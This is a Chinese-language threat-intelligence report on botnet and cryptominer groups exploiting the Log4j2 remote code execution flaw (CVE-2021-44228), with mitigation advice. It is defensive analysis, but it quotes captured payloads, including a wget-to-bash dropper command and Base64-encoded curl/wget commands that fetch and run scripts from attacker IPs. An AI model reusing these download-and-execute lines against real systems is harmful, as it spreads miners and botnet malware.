Log4j2 RCE 漏洞的攻擊事件仍會持續增加
概述
近日,Apache Log4j2被爆出遠程代碼執行高危漏洞(CVE-2021-44228),由于該模塊被廣泛應用在中間件、開發框架、Web應用中,涉及用戶群體大,并且漏洞危害性高,導致漏洞影響力巨大,幾乎波及各行各業。
通過深信服云端數據監控,具有漏洞利用攻擊行為的數量爆發式增長,同時日志分析過程中發現H2Miner、Mirai、Muhstik、Z0Miner等多個黑產組織已將此漏洞利用融入了自身武器庫,預計未來一段時間內利用該漏洞的攻擊事件仍會持續增加。
如下是云端近期攔截的攻擊日志趨勢:
行業分布上,教育、政府、制造業等行業更易受到該漏洞利用攻擊的影響。被攻擊的行業分布如下:
漏洞簡介
漏洞名稱 : Apache Log4j2遠程代碼執行漏洞
漏洞描述:Apache Log4j2遠程代碼執行漏洞漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,攻擊者可利用該漏洞在未授權的情況下,構造惡意數據進行遠程代碼執行攻擊,最終獲取服務器最高權限。
組件名稱 : Apache Log4j2
影響范圍:
2.0.0 ≤ Apache Log4j2 ≤ 2.15.0-rc1
漏洞類型 : 遠程代碼執行
利用條件 :
1、用戶認證:不需要用戶認證
2、前置條件:默認配置
3、觸發方式:遠程
利用難度:容易,無需授權即可遠程代碼執行。
威脅等級:嚴重,能造成遠程代碼執行。
詳細查閱:
https://mp.weixin.qq.com/s/40vKowBxaf6XRAkR8Hdd9w
云端事件監測
截至目前,深信服威脅情報團隊監測到多起Apache Log4j2遠程代碼執行漏洞(CVE-2021-44228)利用事件,我們發現該漏洞已被多個黑產組織武器化,添加到自身的武器庫中以發起網絡攻擊,目前捕獲到H2Miner、Mirai、Muhstik、Z0Miner等病毒家族都已使用此漏洞進行攻擊。
Apache Log4j2漏洞披露及黑產武器化時間線如圖:
01 Mirai攻擊事件
捕獲到的Mirai僵尸網絡使用Log4j2(CVE-2021-44228)漏洞的攻擊payload如下:
payload經Base64解密后,內容如下:
wget -q -O- http://62.210.130.xxx/lh.sh|bash
經分析,lh.sh腳本為前置載荷,會下載執行Mirai的可執行文件,腳本文件內容如下:
Mirai僵尸網絡整體攻擊流程如下:
02 H2Miner攻擊事件
捕獲到的H2Miner挖礦木馬使用Log4j2(CVE-2021-44228)漏洞的攻擊payload如下:
80.71.158.xxx:5558/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL21tbS5zaHx8d2dldCAtcSAtTy0gODAuNzEuMTU4LjEyL21tbS5zaCl8YmFzaA== 82.118.18.xxx:1534/Basic/Command/Base64/KGN1cmwgLXMgODIuMTE4LjE4LjIwMS9saC5zaHx8d2dldCAtcSAtTy0gODIuMTE4LjE4LjIwMS9saC5zaCl8YmFzaA== 92.242.40.xxx:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g= 92.242.40.xxx:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoMi5zaHx8d2dldCAtcSAtTy0gOTIuMjQyLjQwLjIxL2xoMi5zaCl8c2g= |
payload經Base64解密后,內容如下:
經分析,lh.sh/lh2.sh/mmm.sh均為H2Miner的前置加載腳本,負責下載執行后續挖礦和后門模塊,腳本文件內容如下:
H2Miner挖礦木馬整體攻擊流程如下:
03 Muhstik攻擊事件
捕獲到的Muhstik僵尸網絡使用Log4j2(CVE-2021-44228)漏洞的攻擊payload內容如下:
Exploit.class負責下載執行前置腳本log,經反編譯內容如下:
前置腳本log負責下載后續其他惡意載荷,腳本內容如下:
Muhstik僵尸網絡整體攻擊流程如下:
04 Z0Miner攻擊事件
捕獲到的Z0Miner挖礦木馬使用Log4j2(CVE-2021-44228)漏洞的攻擊payload內容如下:
payload經Base64解密后,內容如下:
總結
漏洞是黑產發起攻擊的重要手段,尤其是0day或Nday漏洞已經成為僵尸網絡的常用套路,僵尸網絡為了更有效和廣泛的傳播,會在漏洞被披露的第一時間更新進武器庫。在本次漏洞事件中,Apache Log4j2漏洞因影響范圍巨大、利用門檻極低,不僅H2Miner、Muhstik、Mirai、Z0Miner已開始使用此漏洞,可以預見的是,未來還會有更多的攻擊組織將其加入武器庫進行網絡攻擊。
另外,CVE、補丁和漏洞利用三者之間的時間間隔值得關注。Apache Log4j2被爆出遠程代碼執行高危漏洞,大多數的安全廠商開始開發他們的漏洞簽名和保護策略,同時大多數的攻擊者也開始嘗試利用這個漏洞。在這段攻擊人員與防護人員之間的博弈敏感期,誰能更快地作出響應,誰就能更好地占據先機。
處置建議
升級到最新版本
當前官方已發布最新版本,建議受影響的用戶及時更新升級到最新版本。鏈接如下:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
臨時緩解措施
(1)在項目啟動程序中添加System.setProperty("log4j2.formatMsgNoLookups", "true")(2)直接添加jvm啟動參數:Dlog4j2.formatMsgNoLookups=true;
(3)在應用程序的classpath下添加log4j2.component.properties配置文件(文件名自定義),文件內容:log4j2.formatMsgNoLookups=True。
